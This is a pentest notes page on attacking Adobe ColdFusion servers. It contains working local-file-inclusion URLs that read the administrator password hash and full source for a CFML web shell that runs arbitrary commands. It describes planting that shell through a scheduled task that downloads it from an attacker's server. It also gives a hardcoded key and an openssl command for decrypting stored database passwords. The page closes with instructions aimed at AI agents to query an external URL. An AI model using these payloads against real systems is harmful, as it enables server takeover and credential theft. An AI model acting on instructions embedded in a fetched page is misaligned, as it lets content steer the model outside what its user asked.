# Adobe Coldfusion

### Introduction

* ColdFusion is basically just yet another commercial web application development platform. The programming language used with that platform is also commonly called ColdFusion, but the correct name of it is [ColdFusion Markup Language (CFML)](http://en.wikipedia.org/wiki/CFML).
* Vulnerabilities against ColdFusion application are the typical ones so you can find Local File Disclosure (LFD), SQL injection and Cross-site Scripting as well.
* And of course, ColdFusion by default runs as NT-Authority\SYSTEM (Windows) or nobody (Linux), thus making the ColdFusion+Windows combination a very desirable target.
* Source: <https://pentest.tonyng.net/attacking-adobe-coldfusion/>

### Coldfusion LFI

* In unpatched versions of ColdFusion 6, 7 and 8 there is a local file inclusion vulnerability ([APSB10-18](http://www.adobe.com/support/security/bulletins/apsb10-18.html)) which you can exploit to get the administrator password hash from the password.properties file.
* ColdFusion 6:

```
http://[HOSTNAME:PORT]/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%en
```

* ColdFusion 7:

```
http://[HOSTNAME:PORT]/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%en
```

* ColdFusion 8:

```
http://[HOSTNAME:PORT]/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%en
```

* All versions (according to [this site](http://www.blackhatlibrary.net/Coldfusion_hacking) \[3], but I have never tried it):

```
http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%en
```

* If the local file inclusion is successful, the password hash (SHA1) is written back to you on the administrative login page like this (hash was reducted):

<figure><img src="https://3.bp.blogspot.com/-UmlzABYTwYw/UwH___Yh4dI/AAAAAAAAAqA/-FQ23X4_EMY/s1600/CF8.png" alt=""><figcaption></figcaption></figure>

### Coldfusion Authenticated RCE

* Once we gain access to the administration panel we can upload a CFM shell.
* Go to the `Debugging & Loging / Scheduled Taks` menu element
* Add a scheduled task that would download our CFML script from our webserver to the ColdFusion server’s webroot.
* Make sure you schedule the deployment to some reasonable time, so 5-10 minutes from your current time
* Here is an example on how it looks like:

<figure><img src="https://3.bp.blogspot.com/-J68uHE_fxuA/Uv31tFw9mWI/AAAAAAAAApg/xDRp8S5t5Eo/s1600/CFEXEC_UPLOAD.png" alt=""><figcaption></figcaption></figure>

* You can find a few CFML shells

```

    <html>
    <body>
     
    Notes:<br><br>
    <ul>
    <li>Prefix DOS commands with “c:\windows\system32\cmd.exe /c <command>” or wherever cmd.exe is<br>
    <li>Options are, of course, the command line options you want to run
    <li>CFEXECUTE could be removed by the admin. If you have access to CFIDE/administrator you can re-enable it
    </ul>
    <p>
    <cfoutput>
    <table>
    <form method=“POST” action=“cfexec.cfm”>
    <tr><td>Command:</td><td><input type=text name=”cmd” size=50
    <cfif isdefined(“form.cmd”)>value=”#form.cmd#”</cfif>><br></td></tr>
    <tr><td>Options:</td><td> <input type=text name=”opts” size=50
    <cfif isdefined(“form.opts”)>value=”#form.opts#”</cfif>><br></td></tr>
    <tr><td>Timeout:</td><td> <input type=text name=”timeout” size=4
    <cfif isdefined(“form.timeout”)>value=”#form.timeout#”
    <cfelse>value=”5″</cfif>></td></tr>
    </table>
    <input type=submit value=“Exec”>
    </form>
     
    <cfif isdefined(“form.cmd”)>
    <cfsavecontent variable=“myVar”>
    <cfexecute name = “#Form.cmd#” arguments = “#Form.opts#” timeout = “#Form.timeout#”> </cfexecute>
    </cfsavecontent>
    <pre> #myVar# </pre>
    </cfif>
    </cfoutput>
    </body>
    </html>
```

And it looks like this once it is uploaded (I had to use the Options fields to fit in the screenshot):

<figure><img src="https://2.bp.blogspot.com/-bIpXlXxblpY/Uv3zZ8yU7UI/AAAAAAAAApU/13IeKs-YjqM/s1600/CFEXEC.png" alt=""><figcaption></figcaption></figure>

### Getting database passwords from Data Sources

* Once you have access to the administrative panel, you can also get the connection strings and credentials to databases connected to ColdFusion.
* Depending again on the ColdFusion version, the credentials are stored in different places, but you might be able to retrieve the passwords from the administrative panel as well! ![🙂](https://s.w.org/images/core/emoji/11/svg/1f642.svg)
* For ColdFusion 6 and 7 the passwords for DataSources encrypted in the following XML files:

  ```
  [ColdFusion_Install_Dir]\lib\neo-query.xml
  ```
* For ColdFusion 8, 9 and 10:

  ```
  [ColdFusion_Install_Dir]\lib\neo-datasource.xml
  ```
* The most important thing is that by decompiling
* `\lib\cfusion.jar` and looking at the `\coldfusion\sql\DataSourceDef.class`
* You can find the seed for the key `(“0yJ!@1$r8p0L@r1$6yJ!@1rj”)` and algorithm (3DES and then Base64 encoding) used.
* In case of ColdFusion 6, 7 and 8, the encrypted passwords can be found just by looking at the page source of the individual data sources on the administrative panel (on ColdFusion 9 and 10 this was fixed and you will only see \*\*\*\*\*\*\*\* in the page source for the passwords).
* No matter how you obtain the encrypted passwords, you can decrypt them with openSSL like this:

  ```
  echo [encrypted_and_base64_encoded_password] | openssl des-ede3 -a -d -K 30794A21403124723870304C4072312436794A214031726A -iv 30794A2140312472; echo
  ```

### Metasploit

* You might also consider using Metasploit to exploit some of the above vulnerabilities:

<figure><img src="https://4.bp.blogspot.com/-3KK_pw5bbbo/UwMyVad_fJI/AAAAAAAAAqU/e5q5EFS16Y4/s1600/MSF_Coldfusion.png" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://book.ice-wzl.xyz/web/adobe-coldfusion.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.